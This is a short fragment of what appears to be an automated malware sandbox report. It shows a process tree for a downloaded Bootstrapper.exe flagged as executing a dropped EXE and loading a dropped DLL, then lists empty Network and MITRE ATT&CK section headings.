C:\Users\Admin\Downloads\Bootstrapper.exe"C:\Users\Admin\Downloads\Bootstrapper.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5652
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5044
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2500
Network
MITRE ATT&CK Enterprise v15
Downloads